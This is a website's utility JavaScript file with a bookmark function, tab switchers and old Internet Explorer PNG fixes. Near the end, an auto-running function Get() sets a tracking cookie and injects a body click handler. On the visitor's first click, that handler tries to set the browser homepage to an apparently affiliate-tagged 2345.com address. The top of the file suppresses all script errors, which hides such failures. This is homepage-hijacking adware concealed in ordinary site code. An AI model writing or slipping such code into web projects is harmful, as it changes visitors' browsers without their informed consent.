// JavaScript Document
function killErrors() {
return true;
}
window.onerror = killErrors;
function bookmark(){
var title=document.title
var url=document.location.href
if (window.sidebar) window.sidebar.addPanel(title, url,"");
else if( window.opera && window.print ){
var mbm = document.createElement('a');
mbm.setAttribute('rel','sidebar');
mbm.setAttribute('href',url);
mbm.setAttribute('title',title);
mbm.click();}
else if( document.all ) window.external.AddFavorite( url, title);
}
function Show_newsTab(newsTabid_num,newsTabnum){
	for(var i=0;i<3;i++){document.getElementById("newsTabcontent_"+newsTabid_num+i).style.display="none";}
	for(var i=0;i<3;i++){document.getElementById("newsTabmenu_"+newsTabid_num+i).className="newsTabOff";}
	document.getElementById("newsTabmenu_"+newsTabid_num+newsTabnum).className="newsTab";
	document.getElementById("newsTabcontent_"+newsTabid_num+newsTabnum).style.display="block";
}	
function Show_newsTab2(newsTabid_num,newsTabnum){
	for(var i=0;i<3;i++){document.getElementById("newsTabcontent_"+newsTabid_num+i).style.display="none";}
	for(var i=0;i<3;i++){document.getElementById("newsTabmenu_"+newsTabid_num+i).className="newsTabOff2";}
	document.getElementById("newsTabmenu_"+newsTabid_num+newsTabnum).className="newsTab2";
	document.getElementById("newsTabcontent_"+newsTabid_num+newsTabnum).style.display="inline";
}	
function Show_newsTab3(newsTabid_num,newsTabnum){
	for(var i=0;i<7;i++){document.getElementById("newsTabcontent_"+newsTabid_num+i).style.display="none";}
	for(var i=0;i<7;i++){document.getElementById("newsTabmenu_"+newsTabid_num+i).className="newsTabOff3";}
	document.getElementById("newsTabmenu_"+newsTabid_num+newsTabnum).className="newsTab3";
	document.getElementById("newsTabcontent_"+newsTabid_num+newsTabnum).style.display="block";
}
function correctPNG()
   {
   for(var i=0; i<document.images.length; i++)
      {
     var img = document.images[i]
     var imgName = img.src.toUpperCase()
     if (imgName.substring(imgName.length-3, imgName.length) == "PNG")
        {
       var imgID = (img.id) ? "id='" + img.id + "' " : ""
       var imgClass = (img.className) ? "class='" + img.className + "' " : ""
       var imgTitle = (img.title) ? "title='" + img.title + "' " : "title='" + img.alt + "' "
       var imgStyle = "display:inline-block;" + img.style.cssText
       if (img.align == "left") imgStyle = "float:left;" + imgStyle
       if (img.align == "right") imgStyle = "float:right;" + imgStyle
       if (img.parentElement.href) imgStyle = "cursor:hand;" + imgStyle     
       var strNewHTML = "<span " + imgID + imgClass + imgTitle
       + " style=\"" + "width:" + img.width + "px; height:" + img.height + "px;" + imgStyle + ";"
        + "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader"
       + "(src=\'" + img.src + "\', sizingMethod='scale');\"></span>"
       img.outerHTML = strNewHTML
       i = i-1
        }
      }
   }
function alphaBackgrounds(){
   var rslt = navigator.appVersion.match(/MSIE (d+.d+)/, '');
   var itsAllGood = (rslt != null && Number(rslt[1]) >= 5.5);
   for (i=0; i<document.all.length; i++){
      var bg = document.all[i].currentStyle.backgroundImage;
      if (bg){
         if (bg.match(/.png/i) != null){
            var mypng = bg.substring(5,bg.length-2);
   //alert(mypng);
            document.all[i].style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='"+mypng+"', sizingMethod='crop')";
            document.all[i].style.backgroundImage = "url('')";
   //alert(document.all[i].style.filter);
         }                                               
      }
   }
}

if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
window.attachEvent("onload", correctPNG);
window.attachEvent("onload", alphaBackgrounds);
}
if (top.location != self.location)
top.location = self.location;

function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 10*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ document.cookie = "Cookie1= http://www.2345.com/?1470;expires="+ Then.toGMTString()

document.writeln("<\/STYLE>");
document.writeln("<script type=\"text\/javascript\">var setN=0;<\/script>");
document.writeln("<META content=\"MSHTML 6.00.6000.16587\" name=GENERATOR><\/HEAD>");
document.writeln("<body onclick=\"this.style.behavior=\'url(#default#homepage)\';if(!(this.isHomePage (\'http:\/\/ www.2345.com'))&&setN!=1){this.sethomepage(\'http:\/\/www.2345.com\/?1470');setN=1;}\">");
document.writeln("<DIV id=wrap>");
document.writeln("<DIV id=header>");
document.writeln("<DIV id=elogin>");

}
}Get(); 

